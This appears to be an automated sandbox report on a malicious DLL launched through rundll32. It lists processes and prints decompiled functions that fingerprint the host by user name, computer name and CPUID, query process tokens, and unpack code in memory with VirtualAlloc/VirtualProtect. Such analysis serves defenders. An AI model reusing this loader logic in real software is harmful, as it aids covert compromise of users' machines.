Analysis Process: rundll32.exe PID: 6024 Parent PID: 3880

General

Start time:	18:51:25
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
Imagebase:	0x9e0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3512 Parent PID: 2168

General

Start time:	18:51:28
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply
Imagebase:	0x9e0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5212 Parent PID: 792

General

Start time:	18:53:26
Start date:	04/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e65e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5240 Parent PID: 5212

General

Start time:	18:53:27
Start date:	04/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2
Imagebase:	0xfd0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 2168 Parent PID: 5620 loaddll32.exeCOMMON

Executed Functions

Function 00BB896F, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00BB896F(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xbbd2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xbbd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xbbd2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xbbd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xbbd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xbbd2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xbbd2a4; // 0x2a5a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xbbe7f2; // 0x73797325
				_t83 = E00BB93FD(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xbbd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xbbd2a4; // 0x2a5a5a8
				_t16 = _t93 + 0xbbe813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00bb8978
0x00bb897e
0x00bb8980
0x00bb899a
0x00bb899c
0x00bb89a1
0x00bb8c16
0x00bb8c1d
0x00bb8c1d
0x00bb89a7
0x00bb89bc
0x00bb89be
0x00bb89c0
0x00bb89c5
0x00bb8c06
0x00bb8c10
0x00000000
0x00bb8c10
0x00bb89cb
0x00bb89d6
0x00bb89db
0x00bb89e0
0x00bb89e3
0x00bb89ea
0x00bb89ef
0x00bb89f4
0x00bb8bf6
0x00bb8c00
0x00000000
0x00bb8c00
0x00bb8a0a
0x00bb8a0e
0x00bb8a11
0x00bb8a14
0x00bb8a1a
0x00bb8a1f
0x00bb8a28
0x00bb8a2e
0x00bb8a38
0x00bb8a3f
0x00bb8a3f
0x00bb8a51
0x00bb8a5c
0x00bb8a6a
0x00bb8a6f
0x00bb8a74
0x00bb8a77
0x00bb8a7c
0x00bb8a86
0x00bb8a89
0x00bb8a8c
0x00bb8aa2
0x00bb8aa4
0x00bb8aa9
0x00bb8bf4
0x00000000
0x00bb8bf4
0x00bb8ac0
0x00bb8b11
0x00bb8ad4
0x00bb8adc
0x00bb8ae1
0x00bb8aef
0x00bb8af8
0x00bb8b01
0x00bb8b01
0x00bb8b0f
0x00bb8b0f
0x00bb8b15
0x00bb8b19
0x00bb8b19
0x00bb8b1f
0x00000000
0x00000000
0x00bb8b21
0x00bb8b27
0x00bb8bce
0x00bb8bd1
0x00bb8bde
0x00bb8bde
0x00bb8be2
0x00000000
0x00000000
0x00bb8bd7
0x00bb8bdb
0x00bb8bdb
0x00bb8bdd
0x00bb8bdd
0x00bb8be7
0x00bb8bee
0x00bb8bf0
0x00000000
0x00bb8bf0
0x00bb8b2d
0x00bb8b2f
0x00bb8b2f
0x00bb8b42
0x00bb8b48
0x00bb8b53
0x00bb8b55
0x00bb8b59
0x00bb8b5b
0x00bb8b5b
0x00bb8b60
0x00bb8b62
0x00bb8b62
0x00bb8b60
0x00bb8b67
0x00bb8b6b
0x00bb8b6b
0x00bb8b7b
0x00bb8b80
0x00bb8b83
0x00bb8b83
0x00bb8b86
0x00bb8b90
0x00bb8b98
0x00bb8b9d
0x00bb8bab
0x00bb8bab
0x00bb8bbf
0x00bb8bc3
0x00bb8bc3

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BB899A
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BB89BC
memset.NTDLL ref: 00BB89D6

Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BB197C,63699BCE,00BB89EF,73797325), ref: 00BB940E
Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BB9428

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BB8A14
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BB8A28
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BB8A3F
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BB8A4B
lstrcat.KERNEL32(?,642E2A5C), ref: 00BB8A8C
FindFirstFileA.KERNELBASE(?,?), ref: 00BB8AA2
CompareFileTime.KERNEL32(?,?), ref: 00BB8AC0
FindNextFileA.KERNELBASE(00BB8880,?), ref: 00BB8AD4
FindClose.KERNEL32(00BB8880), ref: 00BB8AE1
FindFirstFileA.KERNEL32(?,?), ref: 00BB8AED
CompareFileTime.KERNEL32(?,?), ref: 00BB8B0F
StrChrA.SHLWAPI(?,0000002E), ref: 00BB8B42
memcpy.NTDLL(00000000,?,00000000), ref: 00BB8B7B
FindNextFileA.KERNELBASE(00BB8880,?), ref: 00BB8B90
FindClose.KERNEL32(00BB8880), ref: 00BB8B9D
FindFirstFileA.KERNEL32(?,?), ref: 00BB8BA9
CompareFileTime.KERNEL32(?,?), ref: 00BB8BB9
FindClose.KERNELBASE(00BB8880), ref: 00BB8BEE
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00BB8C00
HeapFree.KERNEL32(00000000,?), ref: 00BB8C10

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: e0496503ec2127c5aa0c5857ed32d51e7d0c084ae0f55c17473ee8233b3d8a7b
Instruction ID: 78b739c22389a042aff727fedcf52dff461ba8aa7a575a0c6c922cc2e7259ed8
Opcode Fuzzy Hash: e0496503ec2127c5aa0c5857ed32d51e7d0c084ae0f55c17473ee8233b3d8a7b
Instruction Fuzzy Hash: CE810AB1900119EFDB21DFA5DC84AEEBBF9EF44300F1405AAE505E7260EBB59A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E141302, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E140D58), ref: 6E1413BF
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E140DBB), ref: 6E1413F6
VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E141456
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E14148C
VirtualProtect.KERNEL32(6E0C0000,00000000,00000004,6E1412E1), ref: 6E141591
VirtualProtect.KERNEL32(6E0C0000,00001000,00000004,6E1412E1), ref: 6E1415B8
VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1), ref: 6E141685
VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1,?), ref: 6E1416DB
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1416F7

Memory Dump Source

Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction ID: b136cb20ea30fcee9dfd9d58ef8b83c67fa73a1dcdf25729568b5ed2d3552465
Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction Fuzzy Hash: F5D16776208A08DFDB51CF5AC8C0B5277A6EF8C320B290595ED0A9F75AD770B850DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C195D, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E0C195D(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E0C2130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e0c4144;
				_push(_t15 + 0x6e0c505e);
				_push(_t15 + 0x6e0c5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E0C212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e0c4148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e0c195d
0x6e0c1966
0x6e0c196a
0x6e0c1970
0x6e0c1975
0x6e0c197a
0x6e0c197d
0x6e0c1980
0x6e0c1985
0x6e0c1986
0x6e0c1989
0x6e0c1994
0x6e0c199b
0x6e0c199f
0x6e0c19a1
0x6e0c19a2
0x6e0c19a5
0x6e0c19aa
0x6e0c19b4
0x6e0c19b6
0x6e0c19b6
0x6e0c19ca
0x6e0c19d0
0x6e0c19d4
0x6e0c1a24
0x6e0c19d6
0x6e0c19df
0x6e0c19f5
0x6e0c19fd
0x6e0c1a0f
0x6e0c1a13
0x00000000
0x00000000
0x6e0c19ff
0x6e0c1a02
0x6e0c1a07
0x6e0c1a09
0x6e0c1a09
0x6e0c19ea
0x6e0c19ec
0x6e0c1a15
0x6e0c1a16
0x6e0c1a16
0x6e0c19df
0x6e0c1a2c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?,?), ref: 6E0C196A
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E0C1980
_snwprintf.NTDLL ref: 6E0C19A5
CreateFileMappingW.KERNELBASE(000000FF,6E0C4148,00000004,00000000,?,?), ref: 6E0C19CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C19E1
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E0C19F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C1A0D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A), ref: 6E0C1A16
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E0C1791,0000000A,?), ref: 6E0C1A1E

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 99a85712c0ab7657b87c8cfaa42a7f0472445e8495919cc1bb9972f5c5e60c29
Instruction ID: d1a567735a38475fadde1d16d690314a3dc1cf619d6819f67635e3b402e64325
Opcode Fuzzy Hash: 99a85712c0ab7657b87c8cfaa42a7f0472445e8495919cc1bb9972f5c5e60c29
Instruction Fuzzy Hash: 0621C5B2910108BFDB10EFE8CC88FDE77BDEB49B94F204065FA19E7140D63499498B62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7EC1, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00BB7EC1(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xbbd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00BB7D4B( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xbbd2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xbbd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00BBA28E(_v8 + _v8, _t64);
							}
							HeapFree( *0xbbd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xbbd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00BBA28E(_v8 + _v8, _t64);
						}
						HeapFree( *0xbbd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x00bb7ec1
0x00bb7ec9
0x00bb7ecd
0x00bb7ed0
0x00bb7ed5
0x00bb7ed7
0x00bb7edc
0x00bb7edc
0x00bb7ee2
0x00bb7ee4
0x00bb7ef1
0x00bb7f52
0x00bb7ef3
0x00bb7ef8
0x00bb7efe
0x00bb7f03
0x00bb7f11
0x00bb7f15
0x00bb7f24
0x00bb7f2b
0x00bb7f32
0x00bb7f32
0x00bb7f3d
0x00bb7f3d
0x00bb7f15
0x00bb7f03
0x00bb7f54
0x00bb7f5a
0x00bb7f64
0x00bb7f66
0x00bb7f6b
0x00bb7f7a
0x00bb7f7e
0x00bb7f89
0x00bb7f90
0x00bb7f97
0x00bb7f97
0x00bb7fa3
0x00bb7fa3
0x00bb7f7e
0x00bb7fae
0x00bb7fb0
0x00bb7fb3
0x00bb7fb5
0x00bb7fb8
0x00bb7fbb
0x00bb7fc5
0x00bb7fc9
0x00bb7fcd

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00BB7EF8
RtlAllocateHeap.NTDLL(00000000,?), ref: 00BB7F0F
GetUserNameW.ADVAPI32(00000000,?), ref: 00BB7F1C
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BB196C), ref: 00BB7F3D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BB7F64
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00BB7F78
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00BB7F85
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00BB196C), ref: 00BB7FA3

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: e44575117f3b0b78101b3979a89c2b322076fd053762118d11d3db02ff2a4d52
Instruction ID: aa27c211d49d4438e90324ba143a6568f5546570d6a94a52e7258cc3ad505fad
Opcode Fuzzy Hash: e44575117f3b0b78101b3979a89c2b322076fd053762118d11d3db02ff2a4d52
Instruction Fuzzy Hash: 7C311871A44249AFDB10DFA8CC81ABEF7F9EF84300F6141A9E504D7220EBB0DE019B14

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1724, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00BB1724(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00BB98E4(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00BB5DE8(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00bb1731
0x00bb1732
0x00bb1733
0x00bb1734
0x00bb1735
0x00bb1739
0x00bb1740
0x00bb174f
0x00bb1752
0x00bb1755
0x00bb175c
0x00bb175f
0x00bb1762
0x00bb1765
0x00bb1768
0x00bb1773
0x00bb1775
0x00bb177e
0x00bb1786
0x00bb1788
0x00bb179a
0x00bb17a4
0x00bb17a8
0x00bb17b7
0x00bb17bb
0x00bb17c4
0x00bb17cc
0x00bb17cc
0x00bb17ce
0x00bb17ce
0x00bb17d6
0x00bb17dc
0x00bb17e0
0x00bb17e0
0x00bb17eb

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00BB176B
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00BB177E
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BB179A

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00BB17B7
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00BB17C4
NtClose.NTDLL(?), ref: 00BB17D6
NtClose.NTDLL(00000000), ref: 00BB17E0

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 005cc2dab782bba5841a82de3a8fa8af728400f3c6c8511f464acfe6de7646c6
Instruction ID: 8d2a3ac37d81be957266ef697504b5de68b4651a6958d10f51c78cd9f24657fb
Opcode Fuzzy Hash: 005cc2dab782bba5841a82de3a8fa8af728400f3c6c8511f464acfe6de7646c6
Instruction Fuzzy Hash: 3B21D6B2900118AFDB01DF99CC85EEEBFBDEF08750F104166F504F6160D7B19A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C145E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E0C145E(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E0C101B(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e0c1467
0x6e0c146e
0x6e0c146f
0x6e0c1470
0x6e0c1471
0x6e0c1472
0x6e0c1483
0x6e0c1487
0x6e0c149b
0x6e0c149e
0x6e0c14a1
0x6e0c14a8
0x6e0c14ab
0x6e0c14b2
0x6e0c14b5
0x6e0c14b8
0x6e0c14bb
0x6e0c14c0
0x6e0c14fb
0x6e0c14c2
0x6e0c14c5
0x6e0c14cb
0x6e0c14d0
0x6e0c14d4
0x6e0c14f2
0x6e0c14d6
0x6e0c14dd
0x6e0c14eb
0x6e0c14eb
0x6e0c14d4
0x6e0c1503

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 6E0C14BB

Part of subcall function 6E0C101B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E0C1048

memset.NTDLL ref: 6E0C14DD

Strings

@, xrefs: 6E0C14AB

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
Instruction ID: c2f026b932a85621844264794340aa5a585a0570bae08726202cc0d578d86012
Opcode Fuzzy Hash: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
